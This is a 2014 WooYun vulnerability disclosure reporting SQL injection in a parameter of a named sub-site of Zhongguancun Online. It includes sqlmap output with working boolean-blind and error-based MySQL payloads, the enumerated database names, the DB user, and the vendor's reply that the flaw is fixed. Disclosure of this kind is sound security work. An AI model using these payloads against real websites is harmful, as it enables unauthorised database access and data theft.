当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083208

漏洞标题:中关村在线某分站存在SQL注入

相关厂商:中关村在线

漏洞作者: aaaaty

提交时间:2014-11-14 01:15

修复时间:2014-11-17 10:18

公开时间:2014-11-17 10:18

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-14: 细节已通知厂商并且等待厂商处理中
2014-11-14: 厂商已经确认,细节仅向厂商公开
2014-11-17: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

中关村在线某分站存在SQL注入

详细说明:

http://www.itceo.com/www/edata_article/edata_article_list.php?edata_type_id=2
sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: edata_type_id
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original va
lue)
Payload: edata_type_id=MAKE_SET(2816=2816,2)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: edata_type_id=2 AND (SELECT 3030 FROM(SELECT COUNT(*),CONCAT(0x716b
736871,(SELECT (CASE WHEN (3030=3030) THEN 1 ELSE 0 END)),0x71636f6471,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[22:31:54] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:31:54] [INFO] fetching database names
[22:31:55] [INFO] the SQL query used returns 2 entries
[22:31:55] [INFO] retrieved: information_schema
[22:31:55] [INFO] retrieved: hdm1070606_db
[22:31:55] [INFO] fetching tables for databases: 'hdm1070606_db, information_sch
ema'
[22:38:55] [INFO] the SQL query used returns 67 entries
[22:38:55] [INFO] retrieved: COLLATIONS
[22:38:55] [INFO] retrieved: information_schema
[22:38:56] [INFO] retrieved: COLLATION_CHARACTER_SET_APPLICABILITY
[22:38:56] [INFO] retrieved: information_schema
[22:38:56] [INFO] retrieved: COLUMNS
[22:38:56] [INFO] retrieved: information_schema
[22:38:56] [INFO] retrieved: COLUMN_PRIVILEGES
[22:38:57] [INFO] retrieved: information_schema
[22:38:57] [INFO] retrieved: ENGINES
[22:38:57] [INFO] retrieved: information_schema
[22:38:57] [INFO] retrieved: EVENTS
76个表....速度太慢了。不跑了,权限不是很高
current user is DBA: False
database management system users [1]:
[*] 'hdm1070606'@'%'
ps:应该有防火墙,访问次数太多,会禁IP

漏洞证明:

修复方案:

敏感字符过滤

版权声明:转载请注明来源 aaaaty@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-11-14 10:53

厂商回复:

此站并非ZOL网站,对ZOL业务没有任何影响,仍然感谢您的测试,我们已经通知相关分站技术进行处理,给您1分鼓励

最新状态:

2014-11-17:已修复